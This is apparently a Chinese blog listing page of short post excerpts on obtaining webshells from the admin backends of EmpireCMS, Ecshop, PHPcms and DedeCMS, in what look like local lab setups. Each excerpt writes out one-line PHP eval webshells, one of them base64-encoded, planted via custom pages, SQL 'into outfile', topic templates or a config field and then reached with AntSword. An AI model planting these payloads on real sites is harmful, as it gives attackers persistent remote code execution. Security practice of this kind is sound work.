常见框架的webshell
每天都要努力哇
这个作者很懒,什么都没留下…
展开
-
帝国cms框架的Webshell
1:登录 后台地址:127.0.0.1/empirecms/e/admin 登录界面 2:webshell 选择进入后台地图-管理自定义页面 增加自定义页面 这里要用'写入一句话木马 <?php fputs(fopen("shell.php","a"),'<?php phpinfo();eval($_POST[cmd]);?>')?> 然后访问: http://127.0.0.1/empirecms/e/admin/shell.php 用蚁剑连接 可以看到成功连接原创 2020-12-19 16:57:52 · 602 阅读 · 2 评论 -
Ecshop框架的Webshell
一、登录情况 因为后台没有放东西 嘛 所以就啥也没有 这是后台地址 http://127.0.0.1/ecshop/admin/ 二、后台拿webshell三种思路演示 1、执行数据库命令拿webshell 首先需要找到可写入命令的页面: select '<?php eval($_POST[1])?>' into outfile' 最后经过测试?和into outfile都会报错 这里可以利用符号代替或者混淆的方式替换掉,最终的思路是写入一句话 在into outfile写入到改原创 2020-12-19 16:57:59 · 297 阅读 · 0 评论 -
PHPcms框架的Webshell
登录界面 后台网址 www.phpcms.com/admin.php 进入主页面 代码注入拿webshell 接下来 我直接就上图了 写入一句话木马 <?php file_put_contents('ooo.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FhXSk7Pz4=')); ?> 查看专题 继续添加第二个专题 利用burpsuit拦截将代码写入,意思是将专题dayu2-扩展设置-专题首页里的index写入代码调用专题ooo1中的一原创 2020-12-19 16:58:10 · 400 阅读 · 2 评论 -
织梦dedecms的框架的Webshell
一、后台 后台登录 http://www.dedecms.com/dede 后台界面 二、Webshell方法 方法1:文件上传 蚁剑进行连接 成功 方法2:新建一句话文件 蚁剑连接 方法3:html修改 打开模板-默认模版管理-index.htm 文件包含 将FTP21端口改成:<?php @eval($_REQUEST["dayu"]); ?> ...原创 2020-12-19 16:58:19 · 361 阅读 · 1 评论